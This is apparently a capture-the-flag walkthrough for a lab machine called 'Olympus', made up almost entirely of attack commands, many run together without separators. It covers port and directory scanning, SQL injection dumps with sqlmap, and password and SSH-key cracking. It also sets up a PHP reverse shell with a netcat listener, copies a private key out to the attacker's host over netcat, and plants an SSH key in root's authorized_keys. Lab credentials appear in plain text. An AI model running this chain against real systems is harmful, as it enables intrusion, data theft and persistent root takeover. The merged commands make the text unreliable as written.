Olympus
Initial Scan
nmap -A $VICTIM
Scan all ports
TCP/80 - HTTP
SQLMap
Initial Shell
Netcat
Privilege Escalation
Secret Flag
Last updated
nmap -A $VICTIMLast updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u olympus.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtdirb http://olympus.thmsqlmap -r req.txt --bannersqlmap -r req.txt --tablessqlmap -r req.txt --dbms=mysql --dumpjohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt Username: prometheus
Password: summertimeUsername: prometheus
Password: summertimegit clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php gobuster -U prometheus -P summertime dir -u chat.olympus.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtrm -rf /root/.sqlmap/output/olympus.thm/
sqlmap -r req.txt --dbms=mysql --dump -T chats -D olympusnc -lvnppython3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgcd /home/zeus
cat zeus.txt find / -perm -u=s -type f 2> /dev/nullls -lah /usr/bin/cputils
/usr/bin/cputilsnc -l -p 1234 > id_rsacd /tmp
nc -w 3 $KALI 1234 < id_rsachmod 600 id_rsa
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt ssh -i id_rsa zeus@$VICTIM
Password: snowflakecd /var/www/html/0aB44fdS3eDnLkpsz3deGv8TttR4sc/
cat VIGQFQFMYOST.php/lib/defended/libc.so.99;uname -a; w; $suid_bd
whoamissh-keygen -t rsa
cat /root/epic.pubvi /root/.ssh/authorized_keysssh -i epic root@VICTIMgrep -r "flag{" /